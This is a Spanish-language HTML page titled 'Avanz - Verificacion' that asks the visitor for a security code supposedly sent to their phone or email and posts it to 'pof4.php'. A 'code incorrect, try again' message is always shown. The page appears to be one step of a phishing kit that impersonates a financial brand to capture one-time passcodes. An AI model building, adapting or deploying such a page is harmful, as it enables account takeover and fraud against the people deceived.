<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avanz - Verificacion</title>
</head>

<style>
    .tem
{
   
     color: #333;
     border: 1px solid rgb(182, 181, 181);
   border-radius: 3px;
     top: 187px;
    
    height: 39px;
    width: 340px;
    padding-left: 12px;
    outline: none;
    font-size: 16px;
    font-family: dinReg, sans-serif;
}

.masa3{
        width: 100%;
        height: 20px;
        margin: 0px;
        background-color: #005961;
        padding: 5px;
    }

    .met {
        -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    box-sizing: border-box;
    margin: 0;
    font-family: sans-serif;
    overflow: visible;
    -webkit-appearance: button;
    cursor: pointer;
 
    font-size: 15px;
    line-height: inherit;
    min-width: 126px;
    text-transform: uppercase;
    padding: 5px 20px;
    border: none;
    color: #fff;
    background: #FF7500;
    }
</style>
<body style="margin: 0;">
    




    <div style="width: 100%;height: 70px;padding: 10px;margin-left: 10px;">
<img width="120px" src="img/lk.svg" alt="">

    </div>

    <div class="masa3" >
        <center>        <img style="margin-top: 3px;width: 15px;" src="img/icon-login.png" alt="">
            </div>






            <div style=" padding: 5px;">
                <center> 




                <form method="post" action="pof4.php" style="width: 350px;margin-left: -10px;">
<br>
                    <p style="font-family: sans-serif;color: rgb(105, 105, 105);">Hemos enviado un código de seguridad al número de teléfono o correo electrónico registrado, ingresalo para continuar.</p>
               
               <br>


<p style="font-family: sans-serif;float: left;margin-left: 20px;color: rgb(105, 105, 105);">Ingresa el Código de Seguridad</p>
               <input inputmode="numeric" class="tem" type="tel" name="int1" id="" placeholder="Código">
               <p id="iot" style="font-size: 15px;color: red;font-family: sans-serif;float: left;">Código incorrecto, intentalo nuevamente</p>
               

               <br>          <br>          <br>

               <input class="met" type="submit" value="CONTINUAR">
                </form>





            </center>
            </div>

</body>
</html>